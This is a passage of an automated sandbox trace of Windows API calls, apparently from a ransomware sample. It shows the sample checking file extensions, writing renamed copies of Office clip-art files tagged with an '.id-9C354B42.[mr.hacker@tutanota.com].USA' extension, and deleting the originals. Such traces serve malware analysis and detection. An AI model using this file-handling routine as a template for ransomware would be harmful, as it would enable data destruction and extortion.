lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.230] lstrlenW (lpString=".ppt") returned 4 [0273.230] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.230] lstrlenW (lpString=".zip") returned 4 [0273.230] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.230] lstrlenW (lpString=".rar") returned 4 [0273.230] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.230] lstrlenW (lpString=".bz2") returned 4 [0273.230] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.230] lstrlenW (lpString=".7z") returned 3 [0273.230] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.230] lstrlenW (lpString=".dbf") returned 4 [0273.230] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.230] lstrlenW (lpString=".1cd") returned 4 [0273.230] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63 [0273.230] lstrlenW (lpString=".jpg") returned 4 [0273.230] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.230] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.230] lstrlenW (lpString="IN00046_.WMF") returned 12 [0273.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0273.246] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=1158) returned 1 [0273.246] CloseHandle (hObject=0x328) returned 1 [0273.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf")) returned 0x20 [0273.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.280] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.280] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.280] GetLastError () returned 0x0 [0273.280] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x486, lpOverlapped=0x0) returned 1 [0273.289] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x490, lpOverlapped=0x0) returned 1 [0273.289] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.289] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.289] SetEndOfFile (hFile=0x2b0) returned 1 [0273.289] CloseHandle (hObject=0x2b0) returned 1 [0273.289] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.290] SetEndOfFile (hFile=0x2ac) returned 1 [0273.291] CloseHandle (hObject=0x2ac) returned 1 [0273.291] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.291] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00046_.wmf")) returned 1 [0273.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.292] lstrlenW (lpString=".doc") returned 4 [0273.292] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.292] lstrlenW (lpString=".docx") returned 5 [0273.292] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.292] lstrlenW (lpString=".pdf") returned 4 [0273.292] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.292] lstrlenW (lpString=".xls") returned 4 [0273.292] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.292] lstrlenW (lpString=".xlsx") returned 5 [0273.292] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.292] lstrlenW (lpString=".ppt") returned 4 [0273.292] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.292] lstrlenW (lpString=".zip") returned 4 [0273.292] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.292] lstrlenW (lpString=".rar") returned 4 [0273.292] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.292] lstrlenW (lpString=".bz2") returned 4 [0273.292] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.292] lstrlenW (lpString=".7z") returned 3 [0273.292] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.292] lstrlenW (lpString=".dbf") returned 4 [0273.292] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.292] lstrlenW (lpString=".1cd") returned 4 [0273.293] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.293] lstrlenW (lpString=".jpg") returned 4 [0273.293] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.293] lstrlenW (lpString=".doc") returned 4 [0273.293] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.293] lstrlenW (lpString=".docx") returned 5 [0273.293] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.293] lstrlenW (lpString=".pdf") returned 4 [0273.293] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.293] lstrlenW (lpString=".xls") returned 4 [0273.293] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.293] lstrlenW (lpString=".xlsx") returned 5 [0273.293] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.293] lstrlenW (lpString=".ppt") returned 4 [0273.293] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.293] lstrlenW (lpString=".zip") returned 4 [0273.293] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.293] lstrlenW (lpString=".rar") returned 4 [0273.293] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.293] lstrlenW (lpString=".bz2") returned 4 [0273.293] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.293] lstrlenW (lpString=".7z") returned 3 [0273.293] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.293] lstrlenW (lpString=".dbf") returned 4 [0273.293] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.294] lstrlenW (lpString=".1cd") returned 4 [0273.294] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.294] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF") returned 63 [0273.294] lstrlenW (lpString=".jpg") returned 4 [0273.294] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.294] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.294] lstrlenW (lpString="IN00346_.WMF") returned 12 [0273.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.296] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=696) returned 1 [0273.296] CloseHandle (hObject=0x2ac) returned 1 [0273.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf")) returned 0x20 [0273.296] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.296] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.296] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.296] GetLastError () returned 0x0 [0273.296] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x2b8, lpOverlapped=0x0) returned 1 [0273.297] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x2c0, lpOverlapped=0x0) returned 1 [0273.298] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.298] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.298] SetEndOfFile (hFile=0x2b0) returned 1 [0273.298] CloseHandle (hObject=0x2b0) returned 1 [0273.298] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.298] SetEndOfFile (hFile=0x2ac) returned 1 [0273.300] CloseHandle (hObject=0x2ac) returned 1 [0273.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.300] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf")) returned 1 [0273.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.300] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.301] lstrlenW (lpString=".doc") returned 4 [0273.301] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.301] lstrlenW (lpString=".docx") returned 5 [0273.301] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.301] lstrlenW (lpString=".pdf") returned 4 [0273.301] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.301] lstrlenW (lpString=".xls") returned 4 [0273.301] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.301] lstrlenW (lpString=".xlsx") returned 5 [0273.301] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.301] lstrlenW (lpString=".ppt") returned 4 [0273.301] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.301] lstrlenW (lpString=".zip") returned 4 [0273.301] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.301] lstrlenW (lpString=".rar") returned 4 [0273.301] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.301] lstrlenW (lpString=".bz2") returned 4 [0273.301] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.301] lstrlenW (lpString=".7z") returned 3 [0273.301] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.301] lstrlenW (lpString=".dbf") returned 4 [0273.301] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.301] lstrlenW (lpString=".1cd") returned 4 [0273.301] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.301] lstrlenW (lpString=".jpg") returned 4 [0273.301] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.302] lstrlenW (lpString=".doc") returned 4 [0273.302] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.302] lstrlenW (lpString=".docx") returned 5 [0273.302] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.302] lstrlenW (lpString=".pdf") returned 4 [0273.302] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.302] lstrlenW (lpString=".xls") returned 4 [0273.302] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.302] lstrlenW (lpString=".xlsx") returned 5 [0273.302] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.302] lstrlenW (lpString=".ppt") returned 4 [0273.302] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.302] lstrlenW (lpString=".zip") returned 4 [0273.302] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.302] lstrlenW (lpString=".rar") returned 4 [0273.302] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.302] lstrlenW (lpString=".bz2") returned 4 [0273.302] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.302] lstrlenW (lpString=".7z") returned 3 [0273.302] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.302] lstrlenW (lpString=".dbf") returned 4 [0273.302] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.302] lstrlenW (lpString=".1cd") returned 4 [0273.302] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63 [0273.302] lstrlenW (lpString=".jpg") returned 4 [0273.302] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.303] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0273.303] lstrlenW (lpString="IN00351_.WMF") returned 12 [0273.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.305] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=1928) returned 1 [0273.305] CloseHandle (hObject=0x2ac) returned 1 [0273.305] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf")) returned 0x20 [0273.305] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0273.305] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.305] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b0 [0273.306] GetLastError () returned 0x0 [0273.306] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x788, lpOverlapped=0x0) returned 1 [0273.307] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x790, lpOverlapped=0x0) returned 1 [0273.308] ReadFile (in: hFile=0x2ac, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.308] WriteFile (in: hFile=0x2b0, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.308] SetEndOfFile (hFile=0x2b0) returned 1 [0273.308] CloseHandle (hObject=0x2b0) returned 1 [0273.308] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.308] SetEndOfFile (hFile=0x2ac) returned 1 [0273.310] CloseHandle (hObject=0x2ac) returned 1 [0273.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.310] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00351_.wmf")) returned 1 [0273.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.310] lstrlenW (lpString=".doc") returned 4 [0273.310] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.310] lstrlenW (lpString=".docx") returned 5 [0273.310] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.310] lstrlenW (lpString=".pdf") returned 4 [0273.310] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.310] lstrlenW (lpString=".xls") returned 4 [0273.310] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.310] lstrlenW (lpString=".xlsx") returned 5 [0273.310] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.310] lstrlenW (lpString=".ppt") returned 4 [0273.311] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.311] lstrlenW (lpString=".zip") returned 4 [0273.311] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.311] lstrlenW (lpString=".rar") returned 4 [0273.311] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.311] lstrlenW (lpString=".bz2") returned 4 [0273.311] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.311] lstrlenW (lpString=".7z") returned 3 [0273.311] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.311] lstrlenW (lpString=".dbf") returned 4 [0273.311] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.311] lstrlenW (lpString=".1cd") returned 4 [0273.311] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.311] lstrlenW (lpString=".jpg") returned 4 [0273.311] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.311] lstrlenW (lpString=".doc") returned 4 [0273.311] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.311] lstrlenW (lpString=".docx") returned 5 [0273.311] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.311] lstrlenW (lpString=".pdf") returned 4 [0273.311] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.311] lstrlenW (lpString=".xls") returned 4 [0273.311] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.311] lstrlenW (lpString=".xlsx") returned 5 [0273.311] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.311] lstrlenW (lpString=".ppt") returned 4 [0273.312] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00351_.WMF") returned 63 [0273.312] lstrlenW (lpString=".zip") returned 4 [0273.312] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.312] lstrlenW (lpString=".rar") returned 4 [0273.312] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.312] lstrlenW (lpString=".bz2") returned 4 [0273.312] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.312] lstrlenW (lpString=".7z") returned 3 [0273.312] lstrcmpiW 